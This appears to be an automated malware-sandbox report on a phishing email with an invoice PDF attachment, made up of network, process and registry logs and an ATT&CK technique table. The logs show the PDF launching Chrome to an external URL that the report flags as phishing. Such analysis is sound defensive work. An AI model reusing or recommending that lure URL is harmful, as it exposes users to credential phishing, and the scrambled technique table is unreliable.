              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49985 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49986 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49987 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.80:443 -> 192.168.2.17:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49996 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49999 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.31.186:443 -> 192.168.2.17:50002 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.179.44:443 -> 192.168.2.17:50004 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.80:443 -> 192.168.2.17:50007 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:50008 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.17:50019 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50020 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50022 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50021 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50025 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.17:50027 version: TLS 1.2
              Source: classification engineClassification label: mal100.phis.evad.winMSG@42/54@24/82
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250401T0917060423-304.etl
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Invoice PSI-3101.msg"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "643AB39A-A4E4-4758-A594-930BC2D63792" "56F205E5-1FF2-4C68-818E-FEEDCC33C8C1" "304" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "643AB39A-A4E4-4758-A594-930BC2D63792" "56F205E5-1FF2-4C68-818E-FEEDCC33C8C1" "304" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\4WVQT9B6\Invoice PSI-3101.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2140 --field-trial-handle=1584,i,1292238551228575683,14951593506944596080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding EF216C6D274E9055423DAB6199CE9EC9
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\4WVQT9B6\Invoice PSI-3101.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://relaxationstudio.co.uk/pad2.pdf
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,4677847063298128573,9518573577152018583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2140 --field-trial-handle=1584,i,1292238551228575683,14951593506944596080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://relaxationstudio.co.uk/pad2.pdf
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,4677847063298128573,9518573577152018583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation21
              Browser Extensions
              1
              Process Injection
              3
              Masquerading
              OS Credential Dumping1
              Process Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              DLL Side-Loading
              1
              Modify Registry
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Extra Window Memory Injection
              1
              Process Injection
              Security Account Manager14
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
              Application Layer Protocol
